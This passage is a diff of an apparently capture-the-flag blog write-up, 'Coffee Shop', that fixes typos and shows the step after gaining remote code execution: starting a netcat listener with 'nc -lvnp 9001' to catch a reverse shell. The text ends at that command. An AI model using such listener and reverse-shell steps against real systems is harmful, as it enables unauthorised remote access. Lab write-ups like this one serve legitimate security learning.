Jigsaws64/Jigsaws64.github.io/_posts/2024-06-10-CofeeShop.md

 ![RCE](/assets/images/Coffe%20Shop/RCE.png)

 And boom goes the dynimaite, we have RCE.
-Let's set up our netcat listenr to allow the incoming reverse shell that we're going to set up in a seoncd
+Let's set up our netcat listener to allow the incoming reverse shell that we're going to set up

 ```bash
 nc -lvnp 9001